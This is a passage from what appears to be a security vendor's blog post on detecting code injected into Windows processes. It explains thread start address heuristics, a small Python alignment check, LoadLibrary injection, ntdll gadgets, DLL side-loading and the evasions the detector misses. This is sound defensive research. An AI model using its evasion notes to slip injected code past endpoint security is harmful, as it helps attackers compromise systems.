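    if offset >= 3 and code[offset - 3] == 0xC2:
        return True
    if offset >= 5 and code[offset - 5] == 0xE9:
        return True
    return False
```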

In particular, older compilers would regularly place data side by side with code, presumably to achieve performance through data locality. For example, we previously analysed the x64 binaries on Microsoft’s symbol server and noticed that this mixing of code and data was normal in Visual Studio 2012, was mostly remediated in VS2013, and appears to have been finally fixed in VS2015 Update 2.

The third heuristic is yet another compiler convention. As mentioned earlier, compilers like to lay out functions to maximize instruction cache performance, and instructions are typically fetched 16 bytes at a time. But compilers also appear to like saving space, so rather than strictly aligning to 16 bytes, they typically only ensure that the first basic block fits within the smallest possible number of 16-byte lines. In other words, if a basic block is 20 bytes, then it will always need at least two fetches, but the compiler ensures that it doesn’t need three.
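This convention reduces to counting 16-byte lines. In the Python sketch below, `first_block_size` is assumed to come from a disassembler, which this example does not include. A function whose first basic block touches more lines than its size requires is flagged as unconventional.

```python
FETCH = 16  # bytes per instruction fetch line


def fetch_lines(start: int, size: int) -> int:
    """Number of 16-byte lines touched by the range [start, start + size)."""
    return (start + size - 1) // FETCH - start // FETCH + 1


def min_fetch_lines(size: int) -> int:
    """Smallest possible number of lines for `size` bytes: ceil(size / 16)."""
    return -(-size // FETCH)


def wastes_a_fetch(start: int, first_block_size: int) -> bool:
    """True if the first basic block spans more lines than necessary,
    which compilers following this convention avoid."""
    return fetch_lines(start, first_block_size) > min_fetch_lines(first_block_size)
```

For the 20-byte example above, a block starting at 0x100C still fits in two lines, while one starting at 0x100D spills into a third.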

Many common Win32 modules have no valid thread entrypoints at all, so the script checks for start addresses within them.

This list is definitely non-exhaustive.

Kernel32.dll is a special case. LoadLibrary is not technically a valid thread entrypoint, but CreateRemoteThread(kernel32!LoadLibraryA, “signed.dll”) is actually how most security products would prefer software to perform code injection into running processes when necessary. That is, the injected code is signed and loaded into read-only image-backed memory. To the best of our knowledge, this approach was first proposed by Jeffrey Richter in an article in the May 1994 edition of Microsoft Systems Journal, and later included in his book Advanced Windows. So treat LoadLibrary as suspicious, but not necessarily malicious.

ntdll.dll is loaded into every process, so it is often the first choice for a gadget or hook. There are only four valid ntdll entrypoints that we know of, and the script explicitly checks for these.

Two of these functions aren’t exported. Rather than using P/Invoke to download the public symbols and find their offsets in the PDB, the script finds them by querying the start addresses of its own threads. PowerShell already uses worker threads, and the script starts a private ETW logger session to force the creation of a thread that starts at the final address.

DLL side-loading remains a highly popular technique, and side-loaded DLLs are still predominantly unsigned.

This one isn’t a thread start heuristic, but it was too simple not to include. Legitimate threads might impersonate SYSTEM briefly, but (lazy) malware authors (or operators) tend to escalate privileges initially and hold them indefinitely.

Wrapping up

As flagged last time, nothing in security is a silver bullet. You should not expect 100% detection from suspicious thread creations alone.

For example, an adversary could modify their tools to simply not create any new threads, restricting their execution to hijacked threads only. The distinction is perhaps subtle, but Get-InjectedThreadEx only attempts to detect anomalous thread creation addresses, not the broader case of legitimate threads that were subsequently hijacked. This is why, in addition to imposing costs at thread creation, Elastic Security employs other defensive layers including memory signatures, behavioral detections and defense evasion detections.

While it is somewhat easy to hijack a single thread after creation, ensuring that all your malware’s threads, including any third-party payloads, use the right version of the right detection bypass for the installed security products is a maintenance cost for the adversary, and mistakes will be made.

Let’s keep raising the bar. We’d love to hear about thread creation bypasses and scalable detection approaches. We’re stronger together.